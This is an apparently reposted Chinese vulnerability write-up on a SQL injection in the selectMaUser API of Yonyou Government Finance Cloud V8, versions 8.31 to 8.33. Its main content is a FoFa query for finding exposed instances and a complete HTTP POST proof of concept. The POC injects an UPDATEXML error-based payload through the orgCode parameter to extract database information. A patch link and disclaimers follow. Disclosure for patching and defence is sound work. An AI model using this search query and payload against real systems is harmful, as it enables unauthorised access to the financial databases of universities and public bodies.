文章总结: 本文披露用友政务财务云V8产品selectMaUser接口SQL注入漏洞。该漏洞影响8.31至8.33版本,攻击者可利用orgCode参数结合UPDATEXML函数触发报错获取数据库敏感信息。文章提供FoFa搜索语法及完整HTTP请求POC,建议相关单位立即排查并按官方指引升级补丁以防范风险。 综合评分: 71 文章分类: 漏洞POC,漏洞分析,漏洞预警,WEB安全,云安全
【漏洞复现】用友A++V8系列产品selectMaUser接口SQL注入漏洞
PokerSec PokerSec
PokerSec
2026年7月22日 18:07 北京
在小说阅读器读本章
去阅读
「先关注,不迷路」
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞介绍
用友政务财务云V8产品定位“享、智、控”理念,享为信息数据的共享、智为智能智慧的运用、控为全面全程的管控。该产品为满足高校行业特性,打造了包含智能收费、场景化缴费服务、智能报销、高校预算管理,其他薪资收入等模块的智慧服务型高校财务共享平台。财务云V8系统/ma/api/selectMaUser接口存在SQL注入漏洞,攻击者可通过orgCode参数构造恶意SQL语句,利用UPDATEXML函数触发数据库错误,获取数据库敏感信息。
影响版本
用友政务财务云V8产品官方在售及提供服务器的版本(8.31、8.32、8.33)。
fofa
app=”用友-政务财务系统”||body=”/df/portal/getYearRgcode.do”
漏洞复现
POC:
(这微信页面直接复制代码格式会乱,可以浏览器打开复制)
POST /ma/api/selectMaUser HTTP/1.1
Host: xxxx
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
User-Agent: Mozilla/5.0 (Intel Mac OS X 13_12_1) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Content-Length: 86
{"orgCode":"1' AND (updatexml(1,concat(0x7e,(select database()),0x7e),1)) AND '1'='1"}
修复意见
及时更新官方补丁:https://security.yonyou.com/#/patchInfo?identifier=309233a5451d4d349c3bc47937fd4f4e
如有侵权,请及时联系删除。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:PokerSec PokerSec PokerSec《【漏洞复现】用友A++V8系列产品selectMaUser接口SQL注入漏洞》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论